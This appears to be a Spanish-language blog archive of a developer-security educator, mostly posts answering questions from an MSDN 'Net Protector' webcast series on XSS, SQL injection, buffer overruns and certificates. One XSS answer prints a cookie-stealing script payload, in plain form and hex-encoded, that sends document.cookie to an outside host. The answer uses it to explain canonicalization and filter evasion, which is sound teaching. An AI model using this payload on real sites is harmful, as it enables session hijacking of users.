Hector Minaya : Seguridad

Cómo aprovechar las nuevas carácteristicas y herramientas de Windows 7 para lograr aplicaciones más seguras

Hector — Fri, 24 Jul 2009 14:05:00 GMT

En el dia de hoy salio publicado mi nuevo ScreenCast en el MSDN Media Center, hecho para la campaña de Windows 7x7, que soporta el lanzamiento de Windows 7. El tema que toque es uno que he trabajado durante muchos años, la seguridad en el desarrollo de Software.

Pueden ver el ScreenCast en linea aqui.

Cita en Portugués

Hector — Thu, 02 Mar 2006 13:34:00 GMT

Ayer esta navegando y me encontré con la sorpresa de que un website en portugués me había citado con la frase “La Seguridad solo funciona si la forma segura de hacer algo también es la fácil”, la cual estaba en la 2da Misión de Net Protector. La cita fue la siguiente:

"A segurança só funciona se a forma segura de fazer algo for também a mais fácil."
- Héctor Minaya, consultor em tecnologias Microsoft

url: http://www.cfgigolo.com

Preguntas sobre el €ϊ₣ЯaÐ0

Hector — Wed, 01 Mar 2006 12:51:00 GMT

Hoy es la 5ta misión de Net Protector, el tema que trataremos es el €ϊ₣ЯắÐ0. Este es un tema bastante amplio y seria imposible cubrir todas sus vertientes en una sola presentación, asi que no se olviden de bajar el PodCast, ver el WebCast y visitar el Comando Central de Net Protector para mas información.

Las preguntas que se deriven de esta quinta misión la trataremos en este post, solo dejen un comentario y se le proveera una respuesta ASAP.

p.d.: Saludos a los amigos que visitan este blog desde Mexico, su presencia se ha hecho sentir.

NetProtector em Português

Hector — Thu, 23 Feb 2006 23:10:00 GMT

La serie de Net Protector se esta haciendo simultáneamente en portugués para MSDN Brasil. La persona que ha estado llevando a cabo las presentaciones es Mauro Sant’Anna, MVP Visual Developer – Security de Brasil.

Aquí tienen también un articulo de la revista computerworld en portugués hablando sobre esta iniciativa de parte de Microsoft.

Preguntas sobre el SQL Injection

Hector — Wed, 22 Feb 2006 04:02:00 GMT

Hoy es la 4ta misión de Net Protector y vamos a hablar sobre el SQL Injection. Anteriormente la mayoría de preguntas sobre las misiones de Net Protector me han llegado por email. Estoy abriendo este post para que puedan colocar sus preguntas sobre este tema aquí y la compartan con todos.

Para hacer una pregunta solo deben dejar un comentario en este post.

Preguntas sobre el Cross Site Scripting - XSS

Hector — Mon, 20 Feb 2006 19:57:00 GMT

Luego del tercer webcast de Net Protector que hablaba principalmente sobre el XSS (Cross-Site Scripting) me llegaron unas cuantas preguntas que voy a tratar de responder en este post.

Cesar Verano de Colombia envia esto:

He seguido los 3 webcast que has dado hasta el momento de Net protector y me parecen excelentes; a pesar de que lo he echo outline; pero bueno sin mas preambulos; podrias regalarme algunos links de referencia o explicación un poco mas a fondo a los caracteres especiales que ingresas en la url (%3c, %3e, %20); existe alguna otra forma que no sea el % para pasar caracteres especiales; he investigado un poco y se que es la representación en Hexadecimal.

Por que no los puedo enviar como <?
Para que el % ?

El tema a que te refieres es la canonicalizacion, que básicamente se refiere a las diferentes formas que existen para representar un mismo carácter. Por ejemplo el carácter “<” se puede representar como “<”. Un ejemplo mas practico seria el siguiente url:

Formato ASCII
http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>

Formato HEX
http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67
%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f
%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

Ambas quieren decir lo mismo. Pero si vieras el Formato Hex no te dieras cuanto de que todos esos símbolos lo que representan son códigos de JavaScript. También se utiliza esto para tratar de burlar filtros que crean los usuarios para limpiar caracteres inválidos de los strings, ya que los desarrolladores generalmente toman en cuenta las representaciones ASCII, pero no sus variantes.

Aquí tienes algunos links que hablan al respecto:
http://support.microsoft.com/?kbid=887459
http://www.sandsprite.com/Sleuth/papers/RealWorld_XSS_1.html

Dannyvillata@gmail.... envia esto:

Me llamó mucho la atención la forma en que se puede realizar ataques insertando código realmente es algo q no conocía, un año atrás aproximadamente estuve administrando un foro y ahora me doy cuenta que quizá no estaba protegido de forma adecuada, pero me queda la duda ya que en esa ocasión la tecnología que utilice era PHP para los foros con una base de datos MySQL ya que era la que mi proveedor de hosting me facilitaba de forma automatizada.

La duda q tengo, con respecto al CSS es q si esta inserción de codigo por medio de scripts me habría afectado a mi en esa ocasión con la tecnología MySQL, de la misma forma que hubiera afectado a SQL Server, o si sería una forma diferente de ataque que en vez de utilizar scripts dañinos utilizaran código en php malicioso de forma similar, ¿eso podría pasar?.

Por otro lado he observado que en muchos foros se pone como default para los usuarios que El código HTML esté desactivado, esta sería una forma de evitar este tipo de ataques?

Muchas gracias por las iniciativas que toman junto a microsoft por enseñar, he sido participe de la ALSI, PCE, actualmente estoy preparandome para MCAD y sigo de cerca Net Protector así q muchas gracias por todo.

Para responder tu primera pregunta si, esto te hubiera afectado de igual manera sin importar la tecnologia. Esto esta presente en ASP, JSP, PHP, etc. Y si, la razon de que muchos forums dejen desactivado el HTML es para protegerse de este tipo de ataques.

Gabriel de Chile envia esto:

Hector, soy Gabriel de Chile y estoy en los WebCast de Netprotectos... seria posible que me enviaras los codigos utilizados en el webcast 3 acerca del XSS.

Te voy a dar uno mas completo para que puedas jugar un poco mas con esto:
http://www.cgisecurity.com/articles/xss-faq.shtml

Un joven programador Chileno,

Hector — Thu, 16 Feb 2006 15:16:00 GMT

Me llego un mensaje de parte de Diego, un joven programador chileno que esta todavia dando sus primeros pasos en el mudo oscuro de la programación. Lo estoy compartiendo con ustedes para que tambien puedan ayudarlo posteando (en los comentarios de este post) links u otro materiales que le pudieran ayudar a Diego.

De mi parte diego creo que te haria muy bien que tomes algunos tutoriales de OOP (Programación Orientada a Objetos), esta es la base de la mayoria de lenguajes de programaciones modernos. Comienza por ahi y pronto llegaras lejos. Aqui te dejo algunos links:

http://www.monografias.com/trabajos/objetos/objetos.shtml
http://www.monografias.com/trabajos14/progorie/progorie.shtml
http://www.desarrolloweb.com/articulos/499.php?manual=15
http://lenguajes-de-programacion.com/programacion-orientada-a-objetos.shtml
http://www.microsoft.com/spanish/msdn/comunidad/dce/1/entrenamiento/foxpro/1.asp

Mensaje de Diego:

Hola, Hector.

Verás... Soy Diego, tengo 13 años (ya voy para los 14), Chileno... Y soy diseñador gráfico, al menos así me considero yo... En ese ámbito, soy mas conocido por "Waly" que por Diego (Incluso tengo mi logo de diseño, y estoy trabajando en mi portfolio, jejeje).

Mi sueño, hace algún tiempo, era ser diseñador gráfico publicitario, trabajaba en algunas webs diseñando de todo, y me hice amigo de 2 programadores, uno tiene varios certificados ya, y el otro tiene solo 17 años y ya tiene el DCE y no se que más...

Descubrí en la programación algo mucho mas solicitado aquí, en Chile, que el diseño grafico digital, ya que de eso está apestado... Y me quedó gustando mas los caracteres y numeros que las imagenes... Empezé a ir a eventos de Microsoft, a intentar sacar al menos la 1ra estrella... Y casi lo logro, las preguntas que me enredaban eran, precisamente, los ejemplos de código.

Y ese, es mi problema... Creo saber muchas cosas, pero sólo en su teoría, un ejemplo de código, no simple, me complica... Lo mismo me pasó en tu WebCast (aunque no estoy diciendo que estuvo mal, me encanta la manera en la que enseñas, y en como tratas a los usuarios cuando te hacen preguntas cosas... Porque si no fuera así, no te estaría enviando este mail). Y bueno... Yo se que la solución a eso es la práctica, y empezar con otros lenguajes de programación.

Entonces... te diré lo que se relacionado con programación.

PHP, aunque me falta profundizar mucho aún...
VB, todo en teoría...
Algoritmos de cifrado, Codes and Cyphers, Codemakers, Codebreakers, BruteForce (Todo gracias a un libro de Dan Brown; "Fortaleza Digital")
Conceptos de Programación y Desarrollo en general...

Eso nada más... Entonces lo que quiero es que me guíes, por que me creo capaz de aprender algoritmos y logaritmos, para algo tengo hermanos matemáticos jajaja.

Yo creo que lo primero es profundizar el PHP para manejarme en la database, y luego empezar con otros lenguajes, lo malo, es que no tengo ni la primera estrella en el DCE, así que ese evento que Microsoft hizo, donde a cada uno que tuviera la 2da estrella se les regalarÍa un cd de Visual Studio .NET, lamentablemente yo no pude tener ese beneficio.

Así que necesito tu ayuda, y tu tiempo... Me podrías decir qué tengo que hacer, y si te alcanza el tiempo (porque me imagino que hasta este punto ya te debo haber quitado algunos minutos) darme algunos links de utilidad? Desde ya te lo agradesco demasiado...

Ah, y tambien muchas gracias por los PodCasts y los WebCasts, muy bien explicados...

Atentamente
Diego.

Una Reflexion de parte de Mauricio Gomez

Hector — Thu, 16 Feb 2006 15:02:00 GMT

Saludos, me llego una relfexión muy interesanto de parte de Mauricio Gomez de Chile, el es Orador de MSDN Chile, y quiero compartirla con ustedes:

Estimado Héctor, para comenzar recibe mis felicitaciones por tu aporte a la comunidad de desarrolladores. Por poco tiempo y mucho trabajo (tú sabes que son inversamente proporcionales) no he podido presenciar tus webcast en directo, solo he podido hacerlo algunos días después. Pero bueno, vayamos al tema de este mail.

En realidad no sé si calificarla de pregunta o reflexión. Pero tomando en base la premisa de hacer lo posible por no revelar información a un posible atacante, en desarrollo web para Internet no topamos con el tema de los archivos robots.txt. Que si no los pones, los bot spiders pues indexan hasta los directorios a veces más recónditos de tu aplicación, mostrando a veces más información de la que quisiéramos mostrar. Por otro lado si lo ponemos, pues basta poner http://www.midominio.com/robot.txt y podremos acceder a ver al menos información sobre ubicación de directorios en nuestra aplicación.

Bueno, en el fondo terminó más en una reflexión que pregunta, pero un punto a tener en cuenta para aquellos que creen que solo escondiendo un directorio en una app web tienen solucionado el problema, como dice el dicho “puede correr pero no esconderte”, sobre todo en aquellas soluciones hospedadas en algún sistema de hosting externo, en el cual no tenemos control demasiado alto sobre el servidor.

Mauricio Gómez
Delegado Ineta Latam (Chile)
Orador MSDN Chile
Community Launch VS2005 & SQL Server 2005 Speaker
Instructor Programa DCE 2003
Curso: “Desarrollo de Aplicaciones Web”

Mauricio gracias por tus comentarios

Seguridad en un Sitio Web

Hector — Thu, 16 Feb 2006 14:53:00 GMT

Con relación a la segunda Misión de Net Protector lo siguiente me llego de parte de: fjavi@mi.madritel, desde España.

Hola Hector soy programador MCAD de microsoft, y soy un enamorado de la programacion en .Net. Desde hace un año estoy muy interesado en la seguridad, y me gustaria saber si podrias darme o decirme donde buscar un tutorial paso a paso de implementacion de seguridad en un sitio web, ya que tengo de todo pero muy disperos (encriptacion por aqui, certificados por alli, etc). Saludos

Un buen lugar para aprender sobre seguridad es la serie de Net Protector de MSDN, en esta serie estamos tratando todo lo relacionado con seguridad en el desarrollo de software.

Un buen libro que te puedo recomendar es Building Secure Microsoft ASP.Net Applications.

Reflector para .Net

Hector — Thu, 16 Feb 2006 14:27:00 GMT

Con relación a la segunda Misión de Net Protector lo siguiente me llego de parte de jucerc@hotmail.....:

Mi pregunta es si en versiones anteriores de Visual Basic también era posible descodificarlas? y si en .net hay forma de proteger nuestro código? pues una de mis malestares del .Net es que pueden llegar a ver nuestro código y nuestra propiedad intelectual queda al descubierto para cualquiera que posea el Reflector o cualquier otra herramienta.

El Reflector del que estas hablando es una herramienta bien buna de parte de Luz Roeder, la pueden encontrar en: http://www.aisto.com/roeder/dotnet/. La version de Luz Roeder tiene un descompilador que es la parte que muestra el codigo, actualmente esa version soportalos lenguajes del framework de .net solamente.

Existen otras herramientas que tratan de descompilar codigos escritos en otros lenguajes, haciendo una busqueda breve en msnsearch y/o google lo puedes encontrar.

Preguntas de la Segunda Mision de Net Protector

Hector — Sun, 12 Feb 2006 23:25:00 GMT

Resultaron ser muchas las preguntas sobre la segunda misión, estoy haciendo un post para cada una.

La descarga de los WebCasts ya esta disponible en el website de MSDN.!!!

Preguntas de la Primera Mision de Net Protector

Hector — Tue, 07 Feb 2006 14:04:00 GMT

Luego del primer WebCast de Net Protector me llegaron una serie de preguntas que prometí responder por esta vía.

Carlos Alberto Cabrera Bernal
¿Cómo funciona en sí un Buffer Overrun?
Los Buffer Overflows representan una vulnerabilidad común en todas las plataformas, pero son muchos más comunes y fáciles de explotar en los sistemas operativos de Linux/Unix.

Básicamente lo que se hace en un Buffer Overflow es meter mas data dentro del buffer de un programa de la que esta permitida. De esta forma se trata de sobre escribir memoria (overflow) y cambiar la lógica de ejecución del programa.

¿Cómo puedo hacer que el IIS trabaje con certificados?
Un certificado digital permitirá que la comunicación entre tu servidor web y las personas que se conecten a el se cifre. Este certificado es expedido por una compañía autorizada, por ejemplo Verisign. Para hacer esto desde el IIS es bastante fácil, solo debes seguir un wizard que te va a generar el archivo necesario para hacer la solicitud. Puedes ver los pasos en:

http://support.microsoft.com/kb/228821/EN-US/

Cristian Faúndez
Mi consulta tiene relación con las herramientas con que contamos los desarrolladores para testear nuestro código.
¿Que y cuáles herramientas tenemos para VB6, .NET, SQL Server y sitios en ambiente web?

En el Visual Studio Team System edition tiene a su disposición toda una suite de herramientas para lo que es el testing de aplicaciones de todo tipo.

Puedes encontrar toda la información en el site de Microsoft en: http://msdn.microsoft.com/vstudio/teamsystem/tester/default.aspx

Ariel Cacho Mendoza
Donde puedo encontrar informacion para configurar algun certificado de seguridad web?

La puedes encontrar aqui: http://support.microsoft.com/kb/228821/EN-US/

Podrias darme un ejemplo de Buffer Overrun?

Te recomienda que veas este tutorial (esta en ingles) donde te va a dar varios ejemplos: http://www.infosecwriters.com/texts.php?op=display&id=134

Gracias a todos por sus inquietudes, cualquier duda me dejan saber.

Llego la Hora!!

Hector — Wed, 01 Feb 2006 12:34:00 GMT

Ya fue lanzada oficialmente la campaña de Net Protector por MSDN Latam. Para ingresar al site de Net Protector solo debes acceder a: http://www.microsoft.com/spanish/msdn/latam/netpro/

Anímate y completa las misiones que estarán apareciendo en las próximas semanas. El primer webcast será hoy a las 3pm (hora Santo Domingo) y tratara sobre la Seguridad de la Información en General.

Net Protector

Hector — Thu, 12 Jan 2006 00:52:00 GMT

Actualmente estoy trabajando con MSDN Latam en una iniciativa llamada Net Protector, como apoyo a esta serie se han coordinado una serie de WebCasts, Podcasts y materiales tecnicos. Algunos de ustedes ya conoceran esta iniciativa por los emails que ha estado mandando MSDN.

No les puedo dar muchos detalles todavia ya que aun esta en sus inicios, pero si les puedo decir que ya fueron agendados los WebCasts en el MSDN Media Center (http://www.microsoft.com/spanish/msdn/latam/mediacenter/webcast/default.asp).

Son los siguientes:

Net Protector: Misión 1:
Seguridad de la Información en General

Net Protector: Misión 2:
4 Formas de echar todo a perder

Net Protector: Misión 3:
La magia de la Inseguridad

Net Protector: Misión 4:
Aplicación Web + Base de Datos = ¿Seguridad?

Net Protector: Misión 5:
€ïFRàÐ0

Net Protector: Misión 6:
Un camino muy largo

Son todos los miercoles comenzando el 1ero de febrero, hasta el 8 de Marzo. Los espero